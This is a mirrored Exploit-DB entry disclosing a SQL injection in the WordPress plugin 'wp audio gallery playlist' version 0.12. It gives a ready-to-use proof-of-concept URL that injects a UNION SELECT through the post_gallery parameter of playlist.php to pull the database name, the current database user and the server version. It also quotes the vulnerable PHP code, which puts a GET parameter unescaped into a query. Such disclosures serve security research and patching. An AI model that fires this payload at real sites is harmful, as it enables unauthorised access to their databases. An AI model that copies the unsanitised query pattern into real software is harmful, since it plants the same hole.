WordPress Plugin Audio Gallery Playlist 0.12 – SQL Injection - 体验盒子

作者： Miroslav Stampar

日期： 2011-08-30

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/17756/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

# Exploit Title: WordPress wp audio gallery playlist plugin <= 0.12 SQL Injection Vulnerability

# Date: 2011-08-30

# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)

# Software Link: http://downloads.wordpress.org/plugin/wp-audio-gallery-playlist.0.12.zip

# Version: 0.12 (tested)

# Note: magic_quotes has to be turned off

---

PoC

---

http://www.site.com/wp-content/plugins/wp-audio-gallery-playlist/playlist.php?post_gallery=-1' UNION ALL SELECT 1,2,3,4,5,database(),current_user(),8,9,10,11,12,13,14,15,16,17,18,version(),20,21,22,23--%20

---------------

Vulnerable code

---------------

$table_name = $wpdb->prefix . "posts";

...

if (isset($_GET['post_gallery']))

$query = 'SELECT * FROM <code>'.$table_name.'</code> WHERE <code>post_parent</code> = \''.$_GET['post_gallery'].'\' AND<code>post_mime_type</code> = \'audio/mpeg\' ORDER BY <code>menu_order</code> ASC';